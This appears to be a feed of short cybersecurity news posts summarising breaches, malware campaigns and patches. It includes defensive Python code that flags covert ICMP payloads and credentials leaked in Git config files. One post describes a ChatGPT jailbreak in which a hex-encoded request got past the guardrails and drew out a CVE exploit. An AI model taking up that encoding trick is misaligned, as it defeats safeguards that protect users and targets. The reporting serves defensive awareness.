Sophos disclosed today a series of reports dubbed "Pacific Rim" that detail how the cybersecurity company has been sparring with Chinese threat actors for over 5 years as they increasingly targeted networking devices worldwide, including those from Sophos.

Sophos believes that many of the zero-day vulnerabilities are developed by Chinese researchers who not only share them with vendors, but also the Chinese government and associated state-sponsored threat actors.

While many of these attacks put cybersecurity researchers on the defensive, Sophos also had the opportunity to go on the offensive, planting custom implants on devices that were known to be compromised.

These implants allowed Sophos to collect valuable data about the threat actors, including a UEFI bootkit that was observed being deployed to a networking device.

See more: https://www.bleepingcomputer.com/news/security/sophos-reveals-5-year-battle-with-chinese-hackers-attacking-network-devices/

#cybersecurity #sophos 
 NCSC Details ‘Pygmy Goat’ Backdoor Planted on Hacked Sophos Firewall Devices

The UK’s National Cyber Security Centre (NCSC) has published technical documentation of a sophisticated network backdoor being planted on hacked Sophos XG firewall devices and warned that the malware was designed for a broader range of Linux-based network devices.

The backdoor, called Pygmy Goat, uses multiple stealthy techniques to maintain persistence and avoid detection and is capable of disguising malicious traffic as legitimate SSH connections.

The backdoor also makes use of encrypted ICMP packets for covert communication and is clearly the work of a very skilled, professional hacking operator.

See more:
https://www.securityweek.com/ncsc-details-pygmy-goat-backdoor-planted-on-hacked-sophos-firewall-devices/

Original post:
nostr:nevent1qqspaz8g27364sch6ue7nfjwqmn4vy4dwcpk9r9wpmx3farkq8q8m2gppemhxue69uhkummn9ekx7mp0qgspdlfx7qq9fanp28rt67f9ahh5zkrpqwh3n4z9lylkda0zfv6yy7srqsqqqqqpn7e6gx

#cybersecurity #sophos 
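A backdoor that carries encrypted data inside ICMP echo packets leaves a structural trace: stock `ping` payloads are predictable (iputils sends an 8-byte timestamp followed by 0x10, 0x11, ...; Windows sends "abcdefghijklmnopqrstuvwabcdefghi"), while an encrypted blob is neither of those and, once it is long enough to measure, has near-maximal byte entropy. The classifier below is an added example, not NCSC or Sophos tooling: it parses raw ICMP echo messages (assumed to arrive with the IP header already stripped), verifies the RFC 1071 checksum, and labels each packet. The sample packets are constructed, and the "encrypted" payload is a deterministic SHA-256 chain standing in for real ciphertext.

```python
import hashlib
import math
import struct

ECHO_REPLY, ECHO_REQUEST = 0, 8


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over the ICMP header and payload."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(payload: bytes, ident: int = 0x1234, seq: int = 1, typ: int = ECHO_REQUEST) -> bytes:
    """ICMP echo message: type, code, checksum, id, seq, then payload (no IP header)."""
    hdr = struct.pack("!BBHHH", typ, 0, 0, ident, seq)
    return struct.pack("!BBHHH", typ, 0, checksum(hdr + payload), ident, seq) + payload


def parse_echo(raw: bytes):
    """Return (type, code, id, seq, payload, checksum_ok)."""
    typ, code, csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    valid = checksum(raw[:2] + b"\x00\x00" + raw[4:]) == csum
    return typ, code, ident, seq, raw[8:], valid


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 is the maximum)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_stock_ping(payload: bytes) -> bool:
    """iputils: 8-byte timestamp then 0x10, 0x11, ...; Windows: the fixed 32-byte alphabet."""
    if len(payload) >= 16:
        pattern = bytes((0x10 + i) & 0xFF for i in range(len(payload) - 8))
        if payload[8:] == pattern:
            return True
    windows = b"abcdefghijklmnopqrstuvwabcdefghi"
    return 0 < len(payload) <= len(windows) and payload == windows[: len(payload)]


def classify(raw: bytes) -> str:
    typ, code, ident, seq, payload, valid = parse_echo(raw)
    if not valid:
        return "bad-checksum"
    if typ not in (ECHO_REQUEST, ECHO_REPLY):
        return "non-echo"
    if looks_like_stock_ping(payload):
        return "benign-ping"
    if len(payload) >= 128 and entropy(payload) > 7.0:
        return "suspicious: high-entropy payload"      # ciphertext, not a ping
    return "suspicious: non-standard payload"


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for an encrypted blob (chained SHA-256)."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed sample payloads
LINUX_PING = struct.pack("!II", 1730678400, 123456) + bytes(range(0x10, 0x38))  # 56-byte echo
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"
COVERT = pseudo_random(512)

if __name__ == "__main__":
    for name, pkt in (("linux", LINUX_PING), ("windows", WINDOWS_PING), ("covert", COVERT)):
        print(f"{name:8} {classify(build_echo(pkt))}")
```

Entropy alone is a weak signal for the 48-byte payload of a default ping, which is why the stock-pattern check comes first and the entropy test only applies to payloads long enough to measure; in practice you would also watch for echo requests that never get a reply and for payload sizes that vary from packet to packet.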
 Tails 6.9 is out! It updates Tor Browser to 14.0.1 and fixes some reliability issues in automatic upgrades.

Changes and updates
- Update Tor Browser to 14.0.1.
- Update the Tor client to 0.4.8.13.
- Update Thunderbird to 115.16.0.

See more
https://tails.net/news/version_6.9/

#privacy #tails #tor 
 Fake Meta Ads Hijacking Facebook Accounts to Spread SYS01 Infostealer

A malvertising campaign is exploiting Meta’s platform to spread the SYS01 infostealer, targeting men 45+ via fake ads for popular software. The malware steals Facebook credentials, hijacks accounts, especially those administering business pages, and spreads further attacks globally.

See more: https://hackread.com/fake-meta-ads-hijacking-facebook-sys01-infostealer/

#cybersecurity #facebook
 
 Interbank confirms data breach following failed extortion, data leak

​Interbank, one of Peru's leading financial institutions, has confirmed a data breach after a threat actor who hacked into its systems leaked stolen data online.

Previously known as the International Bank of Peru (Banco Internacional del Perú), the company provides financial services to over 2 million customers.

See more: https://www.bleepingcomputer.com/news/security/interbank-confirms-data-breach-following-failed-extortion-data-leak/

#privacy #cybersecurity 
 FakeCall Android Trojan Evolves with New Evasion Tactics and Expanded Espionage Capabilities

The vishing malware known as FakeCall (aka Fakecalls) has become more sophisticated. New research shows an increase in evasion and espionage capabilities for an Android malware that has been known and classified as a banking trojan largely targeting South Korea.

In addition to vishing (voice phishing), FakeCall could also capture live audio and video streams from the infected devices, allowing attackers to steal sensitive data without victim interaction.

Callie Guenther, senior manager of cyber threat research at Critical Start, told SecurityWeek, “The techniques used, such as native API utilization, advanced obfuscation, and remote surveillance, resemble TTPs seen in state-sponsored campaigns. Although not definitively attributed, these capabilities align with those observed in APT groups focused on espionage and high-value financial targeting.”

See more:
SecurityWeek:
https://www.securityweek.com/fakecall-android-trojan-evolves-with-new-evasion-tactics-and-expanded-espionage-capabilities/

BleepingComputer:
https://www.bleepingcomputer.com/news/security/android-malware-fakecall-now-reroutes-bank-calls-to-attackers/

#cybersecurity #vishing 
 Opera Browser Fixes Big Security Hole That Could Have Exposed Your Information

A now-patched security flaw in the Opera web browser could have enabled a malicious extension to gain unauthorized, full access to private APIs.

The attack, codenamed CrossBarking, could have made it possible to conduct actions such as capturing screenshots, modifying browser settings, and account hijacking, Guardio Labs said.

To demonstrate the issue, the company said it managed to publish a seemingly harmless browser extension to the Chrome Web Store that could then exploit the flaw when installed on Opera, making it an instance of a cross-browser-store attack.

The issue has been addressed by Opera as of September 24, 2024, following responsible disclosure. That said, this is not the first time security flaws have been identified in the browser.

See more: https://thehackernews.com/2024/10/opera-browser-fixes-big-security-hole.html

#cybersecurity #opera 
 Google and Mozilla on Tuesday announced security updates for their Chrome and Firefox web browsers, and some of the vulnerabilities they patch are potentially severe.

See more:
https://www.securityweek.com/google-patches-critical-chrome-vulnerability-reported-by-apple/

#cybersecurity #chrome #mozilla 
 Hackers steal 15,000 cloud credentials from exposed Git config files

A large-scale malicious operation named "EmeraldWhale" scanned for exposed Git configuration files to steal over 15,000 cloud account credentials from thousands of private repositories.

Git configuration files, such as /.git/config or .gitlab-ci[.]yml, are used to define various options like repository paths, branches, remotes, and sometimes even authentication information like API keys, access tokens, and passwords.

According to Sysdig, who discovered the campaign, the operation involves using automated tools that scan IP ranges for exposed Git configuration files, which may include authentication tokens.

These tokens are then used to download repositories stored on GitHub, GitLab, and BitBucket, which are scanned for further credentials.
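The leak mechanism described above can be checked from the defender's side. The following is an added example (not Sysdig's or BleepingComputer's code) that parses a Git config file and flags credentials a scanner could harvest from an exposed /.git/config; the ghp_ and glpat- prefixes are real GitHub/GitLab token formats, and every value in the sample config is constructed.

```python
"""Added example: flag credentials embedded in a Git config file.
Everything in SAMPLE_GIT_CONFIG is constructed for illustration."""
import re
from urllib.parse import urlsplit, urlunsplit

# Constructed sample .git/config: one remote with an embedded password, one
# with a bare token as the username, one SSH remote, plus a plaintext helper.
SAMPLE_GIT_CONFIG = """\
# constructed sample, not a real repository
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://deploy:ghp_EXAMPLETOKEN0000000000000000000000000@github.com/acme/app.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "backup"]
\turl = https://ghp_EXAMPLETOKEN0000000000000000000000000@github.com/acme/backup.git
[remote "mirror"]
\turl = git@gitlab.com:acme/app.git
[credential]
\thelper = store
"""

SECTION_RE = re.compile(r'^\s*\[([^\s\]]+)(?:\s+"([^"]*)")?\]\s*$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')
# GitHub personal access tokens (ghp_) and GitLab tokens (glpat-)
TOKEN_RE = re.compile(r'\b(?:ghp_[A-Za-z0-9]{20,}|glpat-[A-Za-z0-9_-]{20,})')


def parse_git_config(text):
    """Parse git's INI-like config into a flat dict keyed by dotted names,
    e.g. 'remote.origin.url'. Comments (# or ;) and blank lines are skipped."""
    entries, section = {}, None
    for raw in text.splitlines():
        line = re.sub(r'(^|\s)[#;].*$', '', raw)
        if not line.strip():
            continue
        m = SECTION_RE.match(line)
        if m:
            name, sub = m.group(1).lower(), m.group(2)
            section = f'{name}.{sub}' if sub is not None else name
            continue
        m = KEY_RE.match(line)
        if m and section is not None:
            entries[f'{section}.{m.group(1).lower()}'] = m.group(2)
    return entries


def redact_url(url):
    """Mask the secret part of a URL's userinfo so findings can be logged safely."""
    p = urlsplit(url)
    if not p.username and not p.password:
        return url
    host = p.hostname or ''
    if p.port:
        host = f'{host}:{p.port}'
    if p.password:
        netloc = f'{p.username}:***@{host}'
    elif TOKEN_RE.match(p.username):
        netloc = f'***@{host}'  # token used as the username
    else:
        netloc = f'{p.username}@{host}'
    return urlunsplit((p.scheme, netloc, p.path, p.query, p.fragment))


def find_leaked_credentials(entries):
    """Return (key, reason, redacted value) for each config entry that would
    hand reusable credentials to anyone who can read the file."""
    findings = []
    for key, value in entries.items():
        if key.startswith('remote.') and key.endswith('.url'):
            p = urlsplit(value)
            if p.scheme in ('http', 'https') and p.password:
                findings.append((key, 'password embedded in remote URL', redact_url(value)))
            elif p.scheme in ('http', 'https') and p.username and TOKEN_RE.match(p.username):
                findings.append((key, 'access token embedded in remote URL', redact_url(value)))
        elif key.endswith('.extraheader') and 'authorization' in value.lower():
            findings.append((key, 'Authorization header stored in config', '[redacted]'))
        elif key == 'credential.helper' and value == 'store':
            findings.append((key, 'plaintext credential store enabled', value))
    return findings


if __name__ == '__main__':
    for key, reason, shown in find_leaked_credentials(parse_git_config(SAMPLE_GIT_CONFIG)):
        print(f'{key}: {reason} -> {shown}')
```

Run against real repositories by reading `.git/config` from disk; a finding on a repository that is served over HTTP is exactly the exposure the campaign scanned for.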

See more: https://www.bleepingcomputer.com/news/security/hackers-steal-15-000-cloud-credentials-from-exposed-git-config-files/

#cybersecurity #git 
 Honeypot Surprise: Researchers Catch Attackers Exposing 15,000 Stolen Credentials in S3 Bucket

Sysdig researchers traced a bizarre S3 bucket misconfiguration to EmeraldWhale, exposing 1.5 terabytes of stolen credentials and scripts.

See more: https://www.securityweek.com/honeypot-surprise-researchers-catch-attackers-exposing-15000-stolen-credentials-in-s3-bucket/

#cybersecurity

 LottieFiles hit in npm supply chain attack targeting users' crypto

LottieFiles announced that specific versions of its npm package carry malicious code that prompts users to connect their cryptocurrency wallets so they can be emptied.

As discovered yesterday, following multiple user reports about strange code injections, the affected versions are Lottie Web Player (“lottie-player”) 2.0.5, 2.0.6, and 2.0.7, all published yesterday.

LottieFiles quickly released a new version, 2.0.8, which is based on the clean 2.0.4, advising users to upgrade to it as soon as possible.

See more: https://www.bleepingcomputer.com/news/security/lottiefiles-hit-in-npm-supply-chain-attack-targeting-users-crypto/

#cybersecurity #crypto 
 Cybercriminals Use Webflow to Deceive Users into Sharing Sensitive Login Credentials

Cybersecurity researchers have warned of a spike in phishing pages created using a website builder tool called Webflow, as threat actors continue to abuse legitimate services like Cloudflare and Microsoft Sway to their advantage.

"The campaigns target sensitive information from different crypto wallets, including Coinbase, MetaMask, Phantom, Trezor, and Bitbuy, as well as login credentials for multiple company webmail platforms, as well as Microsoft 365 login credentials," Netskope Threat Labs researcher Jan Michael Alcantara said in an analysis.

See more: https://thehackernews.com/2024/10/cybercriminals-use-webflow-to-deceive.html

#cybersecurity #crypto #phishing 
 Researchers Discover Over 70 Zero-Day Bugs at Pwn2Own Ireland

The popular hacking competition set up camp in Trend Micro’s Cork office for the first time last week, with competitors discovering and demonstrating exploits for over 70 zero-day vulnerabilities. These will now be responsibly disclosed to the relevant vendors for patching.

A growing number of manufacturers are getting involved in the competition in order to place their products in front of a highly motivated bunch of ethical hackers.

For the first time, Pwn2Own welcomed Meta as a sponsor this year, although no teams were able to find a workable exploit for WhatsApp in a new Messenger App category of the competition. It is zero-click vulnerabilities like this that commercial spyware makers are notorious for finding and exploiting for their customers.

See more: https://www.infosecurity-magazine.com/news/researchers-70-zeroday-bugspwn/

#cybersecurity #zeroday 
 ChatGPT Jailbreak: Researchers Bypass AI Safeguards Using Hexadecimal Encoding and Emojis

Malicious instructions encoded in hexadecimal format could have been used to bypass ChatGPT safeguards designed to prevent misuse. 

The new jailbreak was disclosed on Monday by Marco Figueroa, gen-AI bug bounty programs manager at Mozilla, through the 0Din bug bounty program.

If a user instructs the chatbot to write an exploit for a specified CVE, they are informed that the request violates usage policies. However, if the request was encoded in hexadecimal format, the guardrails were bypassed and ChatGPT not only wrote the exploit, but also attempted to execute it “against itself”, according to Figueroa.

See more:
Security Week: https://www.securityweek.com/first-chatgpt-jailbreak-disclosed-via-mozillas-new-ai-bug-bounty-program/

Dark Reading: https://www.darkreading.com/application-security/chatgpt-manipulated-hex-code

#cybersecurity #ai #chatgpt #jailbreak 
 Italian Politicians Express Alarm at Latest Data Breach Allegedly Affecting 800,000 Citizens

Italian politicians called Monday for better protection of citizens’ online data following a probe into a hacking scheme that allegedly breached law enforcement, tax authority and other sensitive public data.

According to prosecutors in Milan, the data of at least 800,000 Italians was compromised in breaches dating from 2022 by a private investigative agency that compiled dossiers for a fee on top Italian business and political figures. Prosecutors were still investigating which officials had been targeted.

See more: https://www.securityweek.com/italian-politicians-express-alarm-at-latest-data-breach-allegedly-affecting-800000-citizens/

#cybersecurity #privacy 
 Apple Patches Over 70 Vulnerabilities Across iOS, macOS, Other Products

Apple on Monday announced fresh security updates for both iOS and macOS users, addressing over 70 CVEs across its platforms, including several bugs leading to protected file system modifications.

iOS 18.1 and iPadOS 18.1 are now rolling out to mobile users with patches for 28 vulnerabilities that could lead to information leaks, the disclosure of process memory, denial-of-service, sandbox escape, modification of protected system files, heap corruption, and access to restricted files.

The tech giant points to similar outcomes and resolutions for 59 security defects that were resolved with the macOS Sequoia 15.1 update that started rolling out on Monday. The patches address 15 issues that were also addressed in iOS and several flaws in third-party dependencies.

Additionally, Apple released macOS Sonoma 14.7.1 and macOS Ventura 13.7.1 with fixes for over 40 defects each, and announced the rollout of watchOS, tvOS, and visionOS security updates as well.

See more: https://www.securityweek.com/apple-patches-over-70-vulnerabilities-across-ios-macos-other-products/

#cybersecurity #apple #ios 
 Free, France’s second largest ISP, confirms data breach after leak

Free, a major internet service provider (ISP) in France, confirmed over the weekend that hackers breached its systems and stole customer personal information.

The company, which says it had over 22.9 million mobile and fixed subscribers at the end of June, is the second-largest telecommunications company in France and a subsidiary of the Iliad Group, Europe's sixth-largest mobile operator by number of subscribers.

Free has since filed a criminal complaint with the public prosecutor and notified the French National Commission for Information Technology and Civil Liberties (CNIL) and the National Agency for the Security of Information Systems (ANSSI) of the incident.

See more: https://www.bleepingcomputer.com/news/security/free-frances-second-largest-isp-confirms-data-breach-after-leak/

#cybersecurity #security #privacy 
 Google Invests in Alternative Neutral Atom Quantum Technology

Google has privately invested in a firm developing a very different and potentially rival quantum computer technology.

Google, a major figure in quantum computer development using superconducting technology to produce quantum bits (qubits), has invested a multi-million dollar sum into a firm developing an entirely different quantum technology: neutral atoms.

In mid-October 2024 – five years after Google announced it had achieved ‘quantum supremacy’ in 2019 – it invested in the quantum hardware firm QuEra Computing. This was a private investment in a private firm that was founded in 2018. The investment is outside of venture funding, and there are no disclosed details.

See more: https://www.securityweek.com/google-invests-in-alternative-neutral-atom-quantum-technology/

#technology #cybersecurity #google #quantumcomputing 
 Hard-Coded Credentials Vulnerability Found In Kubernetes Image Builder

A critical vulnerability just received a fix with the latest Kubernetes Image Builder release. The vulnerability existed due to hard-coded credentials that allowed unauthorized access to an adversary.

According to its latest advisory, two security issues received patches with the latest Kubernetes Image Builder. One of these, identified as CVE-2024-9486 (CVSS score of 9.8), existed due to hard-coded credentials enabled during the image-building process. These credentials would remain enabled even with the virtual machines (VMs) built with the Proxmox provider, exposing any nodes using the images to root access from an unauthorized adversary.

In addition, the same Image Builder release also addressed another security flaw, identified as CVE-2024-9594. This medium-severity vulnerability (CVSS 6.3) is the same issue explained above, but with lower severity for images built with the Nutanix, OVA, QEMU, or raw providers. Hence, it is tracked separately and explained in its own GitHub issue.

Users should update to Kubernetes Image Builder version 0.1.38 or later to receive all the patches.

See more: https://latesthackingnews.com/2024/10/28/hard-coded-credentials-vulnerability-found-in-kubernetes-image-builder/

#cybersecurity #security #kubernetes 
 New Research Reveals Spectre Vulnerability Persists in Latest AMD and Intel Processors

More than six years after the Spectre security flaw impacting modern CPU processors came to light, new research has found that the latest AMD and Intel processors are still susceptible to speculative execution attacks.

The attack, disclosed by ETH Zürich researchers Johannes Wikner and Kaveh Razavi, aims to undermine the Indirect Branch Predictor Barrier (IBPB) on x86 chips, a crucial mitigation against speculative execution attacks.

Speculative execution refers to a performance optimization feature wherein modern CPUs execute certain instructions out-of-order by predicting the branch a program will take beforehand, thus speeding up the task if the speculatively used value was correct.

"Intel users should make sure their intel-microcode is up to date," the researchers said. "AMD users should make sure to install kernel updates."

See more: https://thehackernews.com/2024/10/new-research-reveals-spectre.html

#cybersecurity #security 
 New tool bypasses Google Chrome’s new cookie encryption system

A researcher has released a tool to bypass Google's new App-Bound encryption cookie-theft defenses and extract saved credentials from the Chrome web browser.

The tool, named 'Chrome-App-Bound-Encryption-Decryption,' was released by cybersecurity researcher Alexander Hagenah after he noticed that others were already figuring out similar bypasses.

Although the tool achieves what multiple infostealer operations have already added to their malware, its public availability raises the risk for Chrome users who continue to store sensitive data in their browsers.
See more: https://www.bleepingcomputer.com/news/security/new-tool-bypasses-google-chromes-new-cookie-encryption-system/

#cybersecurity #security #privacy 
 Chinese Hackers Use CloudScout Toolset to Steal Session Cookies from Cloud Services

A government entity and a religious organization in Taiwan were the target of a China-linked threat actor known as Evasive Panda that infected them with a previously undocumented post-compromise toolset codenamed CloudScout.

"The CloudScout toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies," ESET security researcher Anh Ho said. "Through a plugin, CloudScout works seamlessly with MgBot, Evasive Panda's signature malware framework."

The use of the .NET-based malware tool, per the Slovak cybersecurity company, was detected between May 2022 and February 2023. It incorporates 10 different modules, written in C#, out of which three are meant for stealing data from Google Drive, Gmail, and Outlook. The purpose of the remaining modules remains unknown.

See more: https://thehackernews.com/2024/10/chinese-hackers-use-cloudscout-toolset.html

#cybersecurity #security 
 US says Chinese hackers breached multiple telecom providers

The FBI and the U.S. Cybersecurity & Infrastructure Security Agency (CISA) have disclosed that Chinese hackers breached commercial telecommunication service providers in the United States.

The breached entities have been warned, and the agencies are proactively alerting other potential targets of the elevated cyber activity.

"The U.S. Government is investigating the unauthorized access to commercial telecommunications infrastructure by actors affiliated with the People's Republic of China," reads the announcement.

See more: https://www.bleepingcomputer.com/news/security/us-says-chinese-hackers-breached-multiple-telecom-providers/

#cybersecurity #security 
 Researchers Uncover OS Downgrade Vulnerability Targeting Microsoft Windows Kernel

A new attack technique could be used to bypass Microsoft's Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks.

"This bypass allows loading unsigned kernel drivers, enabling attackers to deploy custom rootkits that can neutralize security controls, hide processes and network activity, maintain stealth, and much more," SafeBreach researcher Alon Leviev said in a report shared with The Hacker News.

The latest findings build on an earlier analysis that uncovered two privilege escalation flaws in the Windows update process (CVE-2024-21302 and CVE-2024-38202) that could be weaponized to rollback an up-to-date Windows software to an older version containing unpatched security vulnerabilities.

See more:
TheHackerNews: https://thehackernews.com/2024/10/researchers-uncover-os-downgrade.html

SecurityWeek:
https://www.securityweek.com/more-details-shared-on-windows-downgrade-attacks-after-microsoft-rolls-out-mitigations/

#cybersecurity #security 
 https://image.nostr.build/568e1824567a4e9f616be1e0af575dfee2d6bf6e224d23389c2e15b0922038e7.jpg

Happy Birthday Zcash! On this day, 28th October 2016, 8 years ago, the genesis block of the Zcash blockchain was generated.

Zcash was the first real-world application of zero-knowledge proofs, a novel method by which one party (the prover) can prove to another (the verifier) that a statement is true, without revealing any information beyond the validity of the statement itself.

#zcash #zk #privacy 
 Several Linux Kernel Driver Maintainers Removed Due To Their Association To Russia.

It was described as due to "compliance requirements", but the commit was vague about what those requirements entailed. Linus Torvalds then commented on the Russian Linux maintainers being de-listed and made it clear that the removals were made because of government compliance requirements and legal issues around Russia. Now today some additional light has been shed on those new Linux kernel "compliance requirements".

Longtime Linux developer and EXT4 file-system maintainer Ted Ts'o has also provided some clarity in a separate Linux kernel mailing list thread. In response to a suggested patch removing Huawei from the MAINTAINERS file given its known relations with the Chinese government, there was more discussion about possible future removals.

See original news:
https://www.phoronix.com/news/Russian-Linux-Maintainers-Drop

See Torvalds statement:
https://www.phoronix.com/news/Linus-Torvalds-Russian-Devs

See Compliance Requirements update:
https://www.phoronix.com/news/Linux-Compliance-Requirements

See the original commit:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e90b675cf94

#linux #cybersecurity 
 QNAP, Synology, Lexmark devices hacked on Pwn2Own Day 3

The third day of Pwn2Own Ireland 2024 continued to showcase the expertise of white hat hackers as they exposed 11 zero-day vulnerabilities, adding $124,750 to the total prize pool, which now stands at $874,875.

Pwn2Own, a global hacking competition, challenges top security researchers to exploit a range of software and hardware devices, with the ultimate goal of earning the prestigious "Master of Pwn" title and claiming up to $1 million in rewards.

On Day 1, participants uncovered 52 zero-day vulnerabilities, and on Day 2, another 51 zero-days were added.

Yesterday, the competition saw impressive performances from teams representing Viettel Cyber Security, DEVCORE, and PHP Hooligans/Midnight Blue, among others.

See more: https://www.bleepingcomputer.com/news/security/qnap-synology-lexmark-devices-hacked-on-pwn2own-day-3/

#cybersecurity #security 
 Irish Watchdog Imposes Record €310 Million Fine on LinkedIn for GDPR Violations

The Irish data protection watchdog on Thursday fined LinkedIn €310 million ($335 million) for violating the privacy of its users by conducting behavioral analyses of personal data for targeted advertising.

"The inquiry examined LinkedIn's processing of personal data for the purposes of behavioral analysis and targeted advertising of users who have created LinkedIn profiles (members)," the Data Protection Commission (DPC) said. "The decision [...] concerns the lawfulness, fairness and transparency of this processing."

See more: https://thehackernews.com/2024/10/irish-watchdog-imposes-record-310.html

#cybersecurity #security #privacy 
 Insurance admin Landmark says data breach impacts 800,000 people

Insurance administrative services company Landmark Admin warns that a data breach stemming from a May cyberattack impacts over 800,000 people.

Due to the sensitive nature of the stolen data, impacted people should monitor their credit reports and bank accounts for suspicious activity.

See more: https://www.bleepingcomputer.com/news/security/insurance-admin-landmark-says-data-breach-impacts-800-000-people/

#cybersecurity #security #privacy 
 UnitedHealth says data of 100 million stolen in Change Healthcare breach

UnitedHealth has confirmed for the first time that over 100 million people had their personal information and healthcare data stolen in the Change Healthcare ransomware attack, marking this as the largest healthcare data breach in recent years.

This data breach was caused by a February ransomware attack on UnitedHealth subsidiary Change Healthcare, which led to widespread outages in the U.S. healthcare system.

During the attack, the threat actors stole 6 TB of data and ultimately encrypted computers on the network, causing the company to shut down IT systems to prevent the spread of the attack.

See more: https://www.bleepingcomputer.com/news/security/unitedhealth-says-data-of-100-million-stolen-in-change-healthcare-breach/

#cybersecurity #security #privacy 
 Cisco fixes VPN DoS flaw discovered in password spray attacks

Cisco fixed a denial of service flaw in its Cisco ASA and Firepower Threat Defense (FTD) software, which was discovered during large-scale brute force attacks against Cisco VPN devices in April.

The flaw is tracked as CVE-2024-20481 and impacts all versions of Cisco ASA and Cisco FTD up until the latest versions of the software.

"A vulnerability in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) of the RAVPN service," reads the CVE-2024-20481 security advisory.

See more: https://www.bleepingcomputer.com/news/security/cisco-fixes-vpn-dos-flaw-discovered-in-password-spray-attacks/

#cybersecurity #security 
 IBM Boosts Guardium Platform to Address Shadow AI, Quantum Cryptography

IBM is updating and upgrading its Guardium platform to provide security for the two primary new technology problems: AI models and quantum safety. 

IBM Guardium AI Security and IBM Guardium Quantum Safe combine to form the newly launched IBM Guardium Data Security Center, which operates across the entire enterprise hybrid infrastructure.

See more: https://www.securityweek.com/ibm-boosts-guardium-platform-to-address-shadow-ai-quantum-cryptography/

#cybersecurity 
 CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094)

A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2024-38094 (CVSS score: 7.2), has been described as a deserialization vulnerability impacting SharePoint that could result in remote code execution.

"An authenticated attacker with Site Owner permissions can use the vulnerability to inject arbitrary code and execute this code in the context of SharePoint Server," Microsoft said in an alert for the flaw.

See more: https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html

#cybersecurity #security 
 WhatsApp now encrypts contact databases for privacy-preserving synching

The WhatsApp messenger platform has introduced Identity Proof Linked Storage (IPLS), a new privacy-preserving encrypted storage system designed for contact management.

The new system solves two long-standing problems WhatsApp users have been dealing with for years, namely the risk of losing their contact lists if they lose their phone and the inability to sync contacts between different devices.

With IPLS, WhatsApp contact lists will now bind to the account rather than the device, allowing users to easily manage them between device changes or replacements.

See more: https://www.bleepingcomputer.com/news/security/whatsapp-now-encrypts-contact-databases-for-privacy-preserving-synching/

#cybersecurity #security 
 Lazarus hackers used fake DeFi game to exploit Google Chrome zero-day

The North Korean Lazarus hacking group exploited a Google Chrome zero-day tracked as CVE-2024-4947 through a fake decentralized finance (DeFi) game targeting individuals in the cryptocurrency space.

Kaspersky discovered the attacks on May 13, 2024, and reported the Chrome zero-day flaw to Google.

Google issued a fix for CVE-2024-4947 on May 25, with Chrome version 125.0.6422.60/.61.

See more: https://www.bleepingcomputer.com/news/security/lazarus-hackers-used-fake-defi-game-to-exploit-google-chrome-zero-day/

#cybersecurity #security 
 Tor 14.0 browser is out! It’s based on Firefox ESR 128, with enhanced privacy protections and bug fixes.

This is the first stable release based on Firefox ESR 128, incorporating a year's worth of changes shipped upstream in Firefox. 

Android adds desktop feature "New circuit for this site", allowing mobile users to request a new circuit, to refresh the connection, in a more targeted fashion.

Extended support for legacy platforms: Windows 7, 8 and 8.1 and macOS 10.12, 10.13 and 10.14 will continue to receive critical security updates on a temporary basis until at least March 2025!

See more:
https://blog.torproject.org/new-release-tor-browser-140/

Twitter post:
https://x.com/torproject/status/1848835179294691396

#privacy #tor #security 
 Critical Vulnerabilities Expose mbNET.mini, Helmholz Industrial Routers to Attacks

Germany’s CERT@VDE has alerted organizations to several critical and high-severity vulnerabilities discovered recently in industrial routers. Impacted vendors have released patches for their products. 

See more: https://www.securityweek.com/critical-vulnerabilities-expose-mbnet-mini-helmholz-industrial-routers-to-attacks/

#cybersecurity #security 
 VMware fixes bad patch for critical vCenter Server RCE flaw

VMware has released another security update for CVE-2024-38812, a critical VMware vCenter Server remote code execution vulnerability that was not correctly fixed in the first patch from September 2024.

The flaw is rated critical (CVSS v3.1 score: 9.8) and stems from a heap overflow weakness in vCenter's DCE/RPC protocol implementation, impacting the vCenter Server and any products incorporating it, such as vSphere and Cloud Foundation.

The flaw does not require user interaction for exploitation, as remote code execution is triggered when a specially crafted network packet is received.

See more: https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-critical-vcenter-server-rce-flaw/

#cybersecurity #security 
 Google Warns of Samsung Zero-Day Exploited in the Wild

A zero-day vulnerability in Samsung’s mobile processors has been leveraged as part of an exploit chain for arbitrary code execution, Google’s Threat Analysis Group (TAG) warns.

Tracked as CVE-2024-44068 (CVSS score of 8.1) and patched as part of Samsung’s October 2024 set of security fixes, the issue is described as a use-after-free bug that could be abused to escalate privileges on a vulnerable Android device.

“An issue was discovered in the m2m scaler driver in Samsung Mobile Processor and Wearable Processor Exynos 9820, 9825, 980, 990, 850, and W920. A use-after-free in the mobile processor leads to privilege escalation,” a NIST advisory reads.

See more: https://www.securityweek.com/google-warns-of-samsung-zero-day-exploited-in-the-wild/

#cybersecurity #security 
